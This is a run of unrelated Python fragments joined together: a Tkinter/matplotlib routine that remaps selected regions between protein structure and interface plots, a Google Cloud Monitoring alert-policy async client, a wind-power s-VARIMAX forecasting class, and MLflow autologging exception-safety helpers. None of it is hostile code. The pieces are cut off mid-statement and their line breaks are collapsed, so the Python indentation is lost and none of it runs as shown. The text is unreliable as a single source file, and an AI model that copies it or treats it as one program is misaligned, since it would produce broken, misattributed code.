##########3 SINGLE ---> SINGLE to_struct = self.map_structure_mode.get().split("ture: ")[1] to_struct_obj = [x for x in self.STRUCTURES if x.objId in to_struct][0] if from_struct_obj is to_struct_obj: #a overlay? 
if self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: to_struct_obj.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) mapping_Y = mapping_X else: mapping_X = lambda x: to_struct_obj.translations.fasta2unal_fasta_f( from_struct_obj.translations.singleplot_restrict(x)) mapping_Y = mapping_X elif self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: to_struct_obj.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x) ) mapping_Y = mapping_X else: mapping_X = lambda x: to_struct_obj.translations.fasta2unal_fasta_f(from_struct_obj.translations.singleplot(x)) mapping_Y = mapping_X else: ############# SINGLE -- >IFACE to_struct = self.map_structure_mode.get().split("Interface: ")[1] to_struct_obj = [x for x in self.DOUBLE_STRUCTURES if x.objId in to_struct][0] if (to_struct_obj.struct_1.objId == from_struct_obj.objId and to_struct_obj.struct_1.chain_simple == from_struct_obj.chain_simple): if self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: x mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x)) else: mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) elif (to_struct_obj.struct_2.objId == from_struct_obj.objId and to_struct_obj.struct_2.chain_simple == from_struct_obj.chain_simple): if self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x)) mapping_Y = lambda x: x else: mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) else: if self.overlay_var.get() or self.restrict_to_structure_var.get(): mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot_restrict(x)) else: mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.translations.singleplot(x)) else: from_struct = self.plot_to_remember.split("Interface: ")[1] from_struct_obj = [x for x in self.DOUBLE_STRUCTURES if x.objId in from_struct][0] if to_single: #### IFACE ---> SINGLE to_struct = self.map_structure_mode.get().split("ture: ")[1] to_struct_obj = [x for x in self.STRUCTURES if x.objId in to_struct][0] if (from_struct_obj.struct_1.objId == to_struct_obj.objId and from_struct_obj.struct_1.chain_simple == to_struct_obj.chain_simple): mapping_X = lambda x:x mapping_Y = lambda x: to_struct_obj.translations.fullplot2struct( from_struct_obj.struct_2.translations.singleplot_restrict(x)) elif (from_struct_obj.struct_2.objId == to_struct_obj.objId and from_struct_obj.struct_2.chain_simple == to_struct_obj.chain_simple): mapping_X = lambda x: to_struct_obj.translations.fullplot2struct( from_struct_obj.struct_1.translations.singleplot_restrict(x)) mapping_Y = lambda x: x else: #TODO 
odpuszczam sprawdzanie czy restrict - ustawiam ze byc musi mapping_X = lambda x: to_struct_obj.translations.fullplot2struct(from_struct_obj.struct_1.translations.singleplot_restrict(x)) mapping_Y = lambda x: to_struct_obj.translations.fullplot2struct(from_struct_obj.struct_2.translations.singleplot_restrict(x)) else: ### IFACE --> IFACE to_struct = self.map_structure_mode.get().split("Interface: ")[1] to_struct_obj = [x for x in self.DOUBLE_STRUCTURES if x.objId in to_struct][0] if (from_struct_obj.struct_1.objId == to_struct_obj.struct_1.objId and from_struct_obj.struct_1.chain_simple == to_struct_obj.struct_1.chain_simple): mapping_X = lambda x: x mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.struct_2.translations.singleplot_restrict(x)) elif (from_struct_obj.struct_1.objId == to_struct_obj.struct_2.objId and from_struct_obj.struct_1.chain_simple == to_struct_obj.struct_2.chain_simple): flip_axes = 1 mapping_Y = lambda x:x mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.struct_2.translations.singleplot_restrict(x)) elif (from_struct_obj.struct_2.objId == to_struct_obj.struct_1.objId and from_struct_obj.struct_2.chain_simple == to_struct_obj.struct_1.chain_simple): flip_axes = 2 mapping_X = lambda x:x mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.struct_1.translations.singleplot_restrict(x)) elif (from_struct_obj.struct_2.objId == to_struct_obj.struct_2.objId and from_struct_obj.struct_2.chain_simple == to_struct_obj.struct_2.chain_simple): mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.struct_1.translations.singleplot_restrict(x)) mapping_Y = lambda x:x else: mapping_X = lambda x: to_struct_obj.struct_1.translations.fullplot2struct( from_struct_obj.struct_1.translations.singleplot_restrict(x)) mapping_Y = lambda x: to_struct_obj.struct_2.translations.fullplot2struct( from_struct_obj.struct_2.translations.singleplot_restrict(x)) new_regions = [] for region in self.SELECTED_REGIONS: X,Y,m = region if flip_axes: X,Y = Y,X X = map(int,X) Y = map(int,Y) X = filter(lambda y: y is not None, map(mapping_X,xrange(X[0],X[1]+1))) Y = filter(lambda y: y is not None, map(mapping_Y,xrange(Y[0],Y[1]+1))) X = [X[0],X[-1]] Y = [Y[0],Y[-1]] new_regions.append((X,Y,m)) self.SELECTED_REGIONS = new_regions def alert_setting_change(self,*args): self.SELECTED_MERS = [] if self.plot_to_remember is not None and self.map_structure_mode.get()!=self.OPCJE[0]: self.mapSelectionBetweenPlots() self.plot_to_remember = self.map_structure_mode.get() self.FIGURE.clf() self.clear_pymol_bonds() self.interface_mode.set(0) self.menubar.entryconfig("Interface plot", state=Tk.DISABLED) if "Single" in self.map_structure_mode.get(): self.current_structure_var = self.map_structure_mode.get().split("ture: ")[1] self.current_structure_obj_var = [x for x in self.STRUCTURES if x.objId in self.current_structure_var][0] self.fileMenu.entryconfig(5,state=Tk.NORMAL) self.fileMenu.entryconfig(6,state=Tk.NORMAL) self.fileMenu.entryconfig(3, state=Tk.NORMAL) self.fileMenu.entryconfig(4, state=Tk.NORMAL) self.comp_mode.set(False) self.menubar.entryconfig("Single structure plot", state=Tk.NORMAL) self.SSframe.grid(column=0,row=0) self.get_pymol_selection.grid(column=0, row=5, sticky="S") self.keep_shown_bonds.grid(column=0, row=6, sticky="S") self.clear_shown_bonds.grid(column=0, row=7, sticky="S") self.keep_selected_regions.grid(row=8,column=0, sticky="S") 
self.legend.grid(column=0, row=9, sticky="S") self.overlay_var.set(0) self.makeSSplot() elif "Interface:" == self.map_structure_mode.get().split()[0]: self.current_structure_var = self.map_structure_mode.get().split("Interface: ")[1] self.current_structure_obj_var = [x for x in self.DOUBLE_STRUCTURES if x.objId in self.current_structure_var][0] self.interface_mode.set(1) self.menubar.entryconfig("Single structure plot", state=Tk.DISABLED) self.menubar.entryconfig("Interface plot", state=Tk.NORMAL) self.SSframe.grid(column=0, row=0) self.get_pymol_selection.grid(column=0, row=5, sticky="S") self.keep_shown_bonds.grid(column=0, row=6, sticky="S") self.clear_shown_bonds.grid(column=0, row=7, sticky="S") self.keep_selected_regions.grid(column=0, row=8, sticky="S") self.legend.grid(column=0, row=9, sticky="S") if not self.current_structure_obj_var.maps.has_key(dm.Structure.flat_modes[dm.Structure.mode]): self.wait("Calculating native contacts map for {}".format(self.current_structure_obj_var.objId)) self.current_structure_obj_var.makeMultiStateContactFile(progress=self._wait_in_progress) self.current_structure_obj_var.makeContactMap(self.current_state_var) self.wait_window.withdraw() self.restrict_to_structure_var.set(1) self.makeDSplot() else: self.menubar.entryconfig("Single structure plot", state=Tk.DISABLED) self.SSframe.grid_remove() self.legend.grid_remove() self.get_pymol_selection.grid_remove() self.keep_shown_bonds.grid_remove() self.keep_selected_regions.grid_remove() self.clear_shown_bonds.grid_remove() plt.subplots_adjust(left=0.07, bottom=0.05, right=0.97, top=0.97, wspace=0.01, hspace=0.01) self.current_structure_var = None self.current_structure_obj_var = None self.fileMenu.entryconfig(5,state=Tk.DISABLED) self.fileMenu.entryconfig(6,state=Tk.DISABLED) self.fileMenu.entryconfig(3,state=Tk.DISABLED) self.fileMenu.entryconfig(4,state=Tk.DISABLED) self.aplot = self.FIGURE.add_subplot(111) self.data = np.array(self.DATA_BACKUP) if self.colormap.get() == "BinaryTP": cmapa, norm = self.binaryColormap() heatmap = self.aplot.pcolorfast(self.data, cmap=cmapa, norm=norm, vmin=self.slider_min.get(), vmax=self.slider_max.get()) else: norm = None cmapa = cm.get_cmap(self.colormap.get()) heatmap = self.aplot.pcolorfast(self.data, cmap=cmapa, vmin=self.slider_min.get(), vmax=self.slider_max.get()) self.cmapa = cmapa self.norm = norm self.recolor_by_trueness_var.set(False) self.recolor_by_any_trueness.set(False) self.overlay_var.set(0) self.aplot.invert_yaxis() self.aplot.set_xlabel("") self.aplot.set_ylabel("") self.canvas.draw() self.customToolbar.update() mpl.colorbar.ColorbarBase(self.cmap_ax, cmap=self.cmapa, norm=self.norm, orientation='vertical') self.cmap_canvas.draw() if self.plot_to_remember is
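# A minimal sketch (with a hypothetical ``mapping`` standing in for the translations.*
# helpers used above) of how mapSelectionBetweenPlots carries a selected residue range
# from one plot to another: every index in the range is mapped, indices with no
# counterpart in the target structure come back as None and are dropped, and the
# surviving endpoints define the new range.
def remap_range(index_range, mapping):
    lo, hi = int(index_range[0]), int(index_range[1])
    mapped = [mapping(i) for i in range(lo, hi + 1)]
    mapped = [m for m in mapped if m is not None]
    return (mapped[0], mapped[-1]) if mapped else None

# e.g. an alignment that shifts indices by 3 but has no counterpart for residue 12:
shift_by_three = lambda i: None if i == 12 else i + 3
assert remap_range((10, 14), shift_by_three) == (13, 17)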
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict import functools import re from typing import Dict, Sequence, Tuple, Type, Union import pkg_resources from google.api_core.client_options import ClientOptions from google.api_core import exceptions as core_exceptions from google.api_core import gapic_v1 from google.api_core import retry as retries from google.auth import credentials as ga_credentials # type: ignore from google.oauth2 import service_account # type: ignore try: OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault] except AttributeError: # pragma: NO COVER OptionalRetry = Union[retries.Retry, object] # type: ignore from google.cloud.monitoring_v3.services.alert_policy_service import pagers from google.cloud.monitoring_v3.types import alert from google.cloud.monitoring_v3.types import alert_service from google.cloud.monitoring_v3.types import mutation_record from google.protobuf import field_mask_pb2 # type: ignore from google.protobuf import wrappers_pb2 # type: ignore from google.rpc import status_pb2 # type: ignore from .transports.base import AlertPolicyServiceTransport, DEFAULT_CLIENT_INFO from .transports.grpc_asyncio import AlertPolicyServiceGrpcAsyncIOTransport from .client import AlertPolicyServiceClient class AlertPolicyServiceAsyncClient: """The AlertPolicyService API is used to manage (list, create, delete, edit) alert policies in Stackdriver Monitoring. An alerting policy is a description of the conditions under which some aspect of your system is considered to be "unhealthy" and the ways to notify people or services about this state. In addition to using this API, alert policies can also be managed through `Stackdriver Monitoring <https://cloud.google.com/monitoring/docs/>`__, which can be reached by clicking the "Monitoring" tab in `Cloud Console <https://console.cloud.google.com/>`__. 
""" _client: AlertPolicyServiceClient DEFAULT_ENDPOINT = AlertPolicyServiceClient.DEFAULT_ENDPOINT DEFAULT_MTLS_ENDPOINT = AlertPolicyServiceClient.DEFAULT_MTLS_ENDPOINT alert_policy_path = staticmethod(AlertPolicyServiceClient.alert_policy_path) parse_alert_policy_path = staticmethod( AlertPolicyServiceClient.parse_alert_policy_path ) alert_policy_condition_path = staticmethod( AlertPolicyServiceClient.alert_policy_condition_path ) parse_alert_policy_condition_path = staticmethod( AlertPolicyServiceClient.parse_alert_policy_condition_path ) common_billing_account_path = staticmethod( AlertPolicyServiceClient.common_billing_account_path ) parse_common_billing_account_path = staticmethod( AlertPolicyServiceClient.parse_common_billing_account_path ) common_folder_path = staticmethod(AlertPolicyServiceClient.common_folder_path) parse_common_folder_path = staticmethod( AlertPolicyServiceClient.parse_common_folder_path ) common_organization_path = staticmethod( AlertPolicyServiceClient.common_organization_path ) parse_common_organization_path = staticmethod( AlertPolicyServiceClient.parse_common_organization_path ) common_project_path = staticmethod(AlertPolicyServiceClient.common_project_path) parse_common_project_path = staticmethod( AlertPolicyServiceClient.parse_common_project_path ) common_location_path = staticmethod(AlertPolicyServiceClient.common_location_path) parse_common_location_path = staticmethod( AlertPolicyServiceClient.parse_common_location_path ) @classmethod def from_service_account_info(cls, info: dict, *args, **kwargs): """Creates an instance of this client using the provided credentials info. Args: info (dict): The service account private key info. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: AlertPolicyServiceAsyncClient: The constructed client. """ return AlertPolicyServiceClient.from_service_account_info.__func__(AlertPolicyServiceAsyncClient, info, *args, **kwargs) # type: ignore @classmethod def from_service_account_file(cls, filename: str, *args, **kwargs): """Creates an instance of this client using the provided credentials file. Args: filename (str): The path to the service account private key json file. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: AlertPolicyServiceAsyncClient: The constructed client. """ return AlertPolicyServiceClient.from_service_account_file.__func__(AlertPolicyServiceAsyncClient, filename, *args, **kwargs) # type: ignore from_service_account_json = from_service_account_file @property def transport(self) -> AlertPolicyServiceTransport: """Returns the transport used by the client instance. Returns: AlertPolicyServiceTransport: The transport used by the client instance. """ return self._client.transport get_transport_class = functools.partial( type(AlertPolicyServiceClient).get_transport_class, type(AlertPolicyServiceClient), ) def __init__( self, *, credentials: ga_credentials.Credentials = None, transport: Union[str, AlertPolicyServiceTransport] = "grpc_asyncio", client_options: ClientOptions = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, ) -> None: """Instantiates the alert policy service client. Args: credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. 
These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. transport (Union[str, ~.AlertPolicyServiceTransport]): The transport to use. If set to None, a transport is chosen automatically. client_options (ClientOptions): Custom options for the client. It won't take effect if a ``transport`` instance is provided. (1) The ``api_endpoint`` property can be used to override the default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT environment variable can also be used to override the endpoint: "always" (always use the default mTLS endpoint), "never" (always use the default regular endpoint) and "auto" (auto switch to the default mTLS endpoint if client certificate is present, this is the default value). However, the ``api_endpoint`` property takes precedence if provided. (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable is "true", then the ``client_cert_source`` property can be used to provide client certificate for mutual TLS transport. If not provided, the default SSL client certificate will be used if present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not set, no client certificate will be used. Raises: google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport creation failed for any reason. """ self._client = AlertPolicyServiceClient( credentials=credentials, transport=transport, client_options=client_options, client_info=client_info, ) async def list_alert_policies( self, request: Union[alert_service.ListAlertPoliciesRequest, dict] = None, *, name: str = None, retry: OptionalRetry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> pagers.ListAlertPoliciesAsyncPager: r"""Lists the existing alerting policies for the workspace. Args: request (Union[google.cloud.monitoring_v3.types.ListAlertPoliciesRequest, dict]): The request object. The protocol for the `ListAlertPolicies` request. name (:class:`str`): Required. The `project <https://cloud.google.com/monitoring/api/v3#project_name>`__ whose alert policies are to be listed. The format is: :: projects/[PROJECT_ID_OR_NUMBER] Note that this field names the parent container in which the alerting policies to be listed are stored. To retrieve a single alerting policy by name, use the [GetAlertPolicy][google.monitoring.v3.AlertPolicyService.GetAlertPolicy] operation, instead. This corresponds to the ``name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.cloud.monitoring_v3.services.alert_policy_service.pagers.ListAlertPoliciesAsyncPager: The protocol for the ListAlertPolicies response. Iterating over this object will yield results and resolve additional pages automatically. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([name]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." 
) request = alert_service.ListAlertPoliciesRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if name is not None: request.name = name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.list_alert_policies, default_retry=retries.Retry( initial=0.1, maximum=30.0, multiplier=1.3, predicate=retries.if_exception_type( core_exceptions.ServiceUnavailable, ), deadline=30.0, ), default_timeout=30.0, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # This method is paged; wrap the response in a pager, which provides # an `__aiter__` convenience method. response = pagers.ListAlertPoliciesAsyncPager( method=rpc, request=request, response=response, metadata=metadata, ) # Done; return the response. return response async def get_alert_policy( self, request: Union[alert_service.GetAlertPolicyRequest, dict] = None, *, name: str = None, retry: OptionalRetry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> alert.AlertPolicy: r"""Gets a single alerting policy. Args: request (Union[google.cloud.monitoring_v3.types.GetAlertPolicyRequest, dict]): The request object. The protocol for the `GetAlertPolicy` request. name (:class:`str`): Required. The alerting policy to retrieve. The format is: :: projects/[PROJECT_ID_OR_NUMBER]/alertPolicies/[ALERT_POLICY_ID] This corresponds to the ``name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.cloud.monitoring_v3.types.AlertPolicy: A description of the conditions under which some aspect of your system is considered to be "unhealthy" and the ways to notify people or services about this state. For an overview of alert policies, see [Introduction to Alerting](\ https://cloud.google.com/monitoring/alerts/). """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([name]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then
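The async client excerpt above ends mid-method, but the pieces already shown (the flattened ``name`` argument, the retry defaults, and the ``ListAlertPoliciesAsyncPager`` return type) are enough for a minimal usage sketch. This is an illustration rather than part of the generated client; "my-project" is a placeholder project id and application-default credentials are assumed.

import asyncio
from google.cloud import monitoring_v3


async def main():
    client = monitoring_v3.AlertPolicyServiceAsyncClient()
    pager = await client.list_alert_policies(name="projects/my-project")
    async for policy in pager:          # the async pager resolves additional pages lazily
        print(policy.name, policy.display_name)


asyncio.run(main())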
# -*- coding: utf-8 -*- """ Created on Fri Nov 19 11:23:03 2021 Authors: <NAME>, <NAME>, and <NAME> E-Mails: {aand17, mvejli17, <EMAIL> In this module the main functionality supporting the use of seasonal autoregressive integrated moving average models as described in the report Forecasting Wind Power Production - Chapter 2: Time Series Analysis This model class can be used to estimate parameters of s-ARIMAX and s-VARIMAX models using the scripts - sARIMAX_validation - sARIMAX_test - sVARIMAX_validation - sVARIMAX_test The module has been developed using Python 3.9 with the libraries numpy and scipy. """ import numpy as np from time import time class sVARMAX(object): """ Main class for estimation and forecasting of s-VARIMAX(p, d, q) X (p_s, d_s, q_s)_s models using OLS for quick and dirty fit of parameters. Details regarding the models can be found in the report Forecasting Wind Power Production - Chapter 2: Time Series Analysis - Chapter 6: Experimental Setup - Section 6.2.2: s-ARIMAX - Section 6.2.4: s-VARIMAX """ def __init__(self, y, z_reg, z_NWP, missing_t, p=1, d=0, q=0, p_s=0, q_s=0, s=288, m=0, m_s=0, l="all", use_NWP=True, use_reg=True): """ Parameters ---------- y : ndarray, size=(n, k) Power data. z_reg : ndarray, size=(n, 2) Regulation data. z_NWP : ndarray, size=(55, n_nwp, 11*k) Numerical weather prediction data. missing_t : ndarray Array of time indices where a discontinuity in time is present due to missing power history data. The first entry in the array is zero and the last entry in the list is n. p : int, optional Autoregressive order. The default is 1. d : int Order of differencing. Options are 0 and 1. The default is 0. q : int Moving average order. The default is 0. p_s : int, optional Seasonal autoregressive order. The default is 0. q_s : int, optional Seasonal moving average order. The default is 0. s : int, optional Seasonal delay. The default is 288. m : int, optional Order of autoregressive model used for the initial parameter estimate. The default is 0. m_s : int, optional Seasonal order for the autoregressive model used for the initial parameter estimate. The default is 0. l : int, optional Sub-grid. Options are l = 0, \dots, 20. This input should be given in the case of a univariate time series model. The default is "all". use_NWP : bool, optional Boolean variable to decide if numerical weather predictions (NWPs) should be used as exogenous variables. The default is True. use_reg : bool, optional Boolean variable to decide if down-regulation should be used as an exogenous variable. The default is True. 
""" # Initialize variables self.use_reg = use_reg self.use_NWP = use_NWP self.p = p self.d = d self.q = q self.p_s = p_s self.q_s = q_s self.s = s self.l = l self.m = m self.m_s = m_s if p_s == 0: assert m_s == 0 assert d == 0 or d == 1 # Store data self.y, self.missing_t = self.do_differencing(y.astype(dtype=np.float32), missing_t) self.nr_missing_t = len(self.missing_t)-1 if self.use_reg: self.z_reg = z_reg.astype(dtype=np.float32) else: self.z_reg = None if self.use_NWP: self.z_NWP = z_NWP.astype(dtype=np.float32) else: self.z_NWP = None # Initialize more variables self.n, self.k = np.shape(self.y) if self.use_NWP is True and self.use_reg is True: self.r_part = 13 elif self.use_NWP is True and self.use_reg is False: self.r_part = 12 elif self.use_NWP is False and self.use_reg is True: self.r_part = 2 elif self.use_NWP is False and self.use_reg is False: self.r_part = 1 else: raise AssertionError("Invalid input(s) supplied to use_NWP and/or use_reg") self.r = self.k*self.r_part self.max_delay_AR = p_s*s + p # The maximum delay in the autoregressive part self.max_delay_MA = q_s*s + q # The maximum delay in the moving average part self.max_delay = max(self.max_delay_AR, self.max_delay_MA) # The maximum delay self.p_tot = p+(p+1)*p_s # Total number of autoregressive delays self.q_tot = q+(q+1)*q_s # Total number of moving average delays # Choose exogenous variable method if self.use_NWP is False: self.make_z = self.make_EMD_z elif self.use_NWP is True and self.use_reg is True: self.make_z = self.make_NWP_z else: raise AssertionError("This case is not supported.") def do_differencing(self, y, missing_t): """ Differencing for the power data. Note that differencing for the exogenous variables are done in make_NWP_z(). Parameters ---------- y : ndarray, size=(n, 21) Wind power data. missing_t : array Array of time indices where a discontinuity in time is present due to missing power history data. The first entry in the array is zero and the last entry is n. Returns ------- y : ndarray, size(n, k) Differenced wind power data. missing_t : array Array of time indices where a discontinuity in time is present due to missing power history data for the differenced data. The first entry in the array is zero and the last entry is n. """ if self.d == 0: return y, missing_t # if self.l != "all": # power = np.expand_dims(y[:, self.l], -1) # y = power elif self.d == 1: # if self.l != "all": # power = np.expand_dims(y[:, self.l], -1) # elif self.l == "all": # power = y y = y[1:, :] - y[:-1, :] missing_t[1:] = missing_t[1:]-1 return y, missing_t def update_parameters(self, Theta): """ Updates the parameters using the dictionary Theta. Save to self ------- Psi, Psi, Xi, Sigma_u """ self.Phi = Theta["Phi"] if self.q != 0 or self.q_s != 0: self.Psi = Theta["Psi"] else: self.Psi = [] self.Xi = Theta["Xi"] self.Sigma_u = Theta["Sigma_u"] def return_parameters(self): return self.Phi, self.Psi, self.Xi, self.Sigma_u def fit(self): """ Conduct parameter estimation using OLS (quick and dirty). 
""" self.z = np.zeros((self.n, self.r)) for t in range(self.n): self.z[t, :] = self.make_z(0, t, self.z_reg, self.z_NWP).astype(dtype=np.float32) if self.q == 0: Xi, Phi, Sigma_u, _ = self.sVARX_fit(self.p, self.p_s, self.s) Theta = {"Phi": Phi, "Psi": None, "Xi": Xi, "Sigma_u": Sigma_u} else: # Do initial parameter estimation Xi, Phi, Psi, Sigma_u = self.sVARMAX_fit(self.m, self.m_s) Theta = {"Phi": Phi, "Psi": Psi, "Xi": Xi, "Sigma_u": Sigma_u} self.update_parameters(Theta) def sVARX_fit(self, p, p_s, s): """ Fit a s-VARX(p) x (p_s)_s using OLS. Parameters ---------- p : int Autoregressive order. p_s : int Seasonal autoregressive order. s : int Seasonal delay. Returns ------- Xi : ndarray, size=(k, r) Exogenous variable parameter matrix. Phi : list, len=(p+(p+1)*p_s) List of autoregressive parameter matrices given as ndarrays of size=(k, k). Sigma_u : ndarray, size=(k, k) Covariance of white noise process. u_hat : ndarray, size=(n, k) Estimate of white noise process. """ if self.p_s == 0 and self.q_s == 0: if self.d == 0 and self.l == "all": print(f"Fit a VARX({p}) model.") elif self.d == 1 and self.l == "all": print(f"Fit a VARIMAX({p}, {self.d}, {0}) model.") elif self.d == 0 and self.l != "all": print(f"Fit a ARX({p}) model.") elif self.d == 1 and self.l != "all": print(f"Fit a ARIMAX({p}, {self.d}, {0}) model.") else: raise AssertionError("Invalid differencing input. Options are d={0, 1}.") else: if self.d == 0 and self.l == "all": print(f"Fit a s-VARX({p}) x ({p_s})_{s} model.") elif self.d == 1 and self.l == "all": print(f"Fit a s-VARIMAX({p}, {self.d}, {0}) x ({p_s}, {0}, {0})_{s} model.") elif self.d == 0 and self.l != "all": print(f"Fit a s-ARX({p}) x ({p_s})_{s} model.") elif self.d == 1 and self.l != "all": print(f"Fit a s-ARIMAX({p}, {self.d}, {0}) x ({p_s}, {0}, {0})_{s} model.") else: raise AssertionError("Invalid differencing input. Options are d={0, 1}.") delay_list_AR = [j_s*s+j for j_s in range(p_s+1) for j in range(p+1)][1:] max_delay_AR = p_s*s + p p_tot = p+(p+1)*p_s u_hat_temp = np.zeros((self.n-2*288-(max_delay_AR*self.nr_missing_t), self.k), dtype=np.float32) pars = np.zeros((p_tot*self.k+self.r_part, self.k), dtype=np.float32) idx_list = [] if self.l == "all": iter_l = 0 else: iter_l = self.l for l in range(iter_l, iter_l+self.k): idx = 0 Y = np.zeros(self.n-2*288-(max_delay_AR*self.nr_missing_t), dtype=np.float32) X = np.zeros((self.n-2*288-(max_delay_AR*self.nr_missing_t), p_tot*self.k+self.r_part), dtype=np.float32) for missing_t_idx in range(self.nr_missing_t): idx_list.append(idx) a = self.missing_t[missing_t_idx]+max_delay_AR if missing_t_idx < self.nr_missing_t-1: b = self.missing_t[missing_t_idx+1]-288 else: b = self.missing_t[missing_t_idx+1] for t in range(a, b): X_t = np.zeros((p_tot, self.k)) for counter, delay in enumerate(delay_list_AR): X_t[counter, :] = self.y[t-delay, :] X[idx, :p_tot*self.k] = X_t.flatten() if self.k == 1: X[idx, p_tot*self.k:] = self.z[t, :] Y[idx] = self.y[t, 0] elif self.k == 21: X[idx, p_tot*self.k:] =
import abc import inspect import itertools import functools import os import uuid import warnings from abc import abstractmethod from contextlib import contextmanager import mlflow from mlflow.entities.run_status import RunStatus from mlflow.tracking.client import MlflowClient from mlflow.utils import gorilla from mlflow.utils.autologging_utils import _logger from mlflow.utils.autologging_utils.events import AutologgingEventLogger from mlflow.utils.autologging_utils.logging_and_warnings import ( set_mlflow_events_and_warnings_behavior_globally, set_non_mlflow_warnings_behavior_for_current_thread, ) from mlflow.utils.mlflow_tags import MLFLOW_AUTOLOGGING _AUTOLOGGING_TEST_MODE_ENV_VAR = "MLFLOW_AUTOLOGGING_TESTING" def try_mlflow_log(fn, *args, **kwargs): """ Catch exceptions and log a warning to avoid autolog throwing. """ try: return fn(*args, **kwargs) except Exception as e: if is_testing(): raise else: warnings.warn("Logging to MLflow failed: " + str(e), stacklevel=2) # Function attribute used for testing purposes to verify that a given function # has been wrapped with the `exception_safe_function` decorator _ATTRIBUTE_EXCEPTION_SAFE = "exception_safe" def exception_safe_function(function): """ Wraps the specified function with broad exception handling to guard against unexpected errors during autologging. """ if is_testing(): setattr(function, _ATTRIBUTE_EXCEPTION_SAFE, True) def safe_function(*args, **kwargs): try: return function(*args, **kwargs) except Exception as e: if is_testing(): raise else: _logger.warning("Encountered unexpected error during autologging: %s", e) safe_function = update_wrapper_extended(safe_function, function) return safe_function def _exception_safe_class_factory(base_class): """ Creates an exception safe metaclass that inherits from `base_class`. """ class _ExceptionSafeClass(base_class): """ Metaclass that wraps all functions defined on the specified class with broad error handling logic to guard against unexpected errors during autlogging. Rationale: Patched autologging functions commonly pass additional class instances as arguments to their underlying original training routines; for example, Keras autologging constructs a subclass of `keras.callbacks.Callback` and forwards it to `Model.fit()`. To prevent errors encountered during method execution within such classes from disrupting model training, this metaclass wraps all class functions in a broad try / catch statement. Note: `ExceptionSafeClass` does not handle exceptions in class methods or static methods, as these are not always Python callables and are difficult to wrap """ def __new__(cls, name, bases, dct): for m in dct: # class methods or static methods are not callable. if callable(dct[m]): dct[m] = exception_safe_function(dct[m]) return base_class.__new__(cls, name, bases, dct) return _ExceptionSafeClass ExceptionSafeClass = _exception_safe_class_factory(type) # `ExceptionSafeClass` causes an error when used with an abstract class. # # ``` # class AbstractClass(abc.ABC): # ... # # class DerivedClass(AbstractClass, metaclass=ExceptionSafeClass): # ... # ``` # # This raises: # # 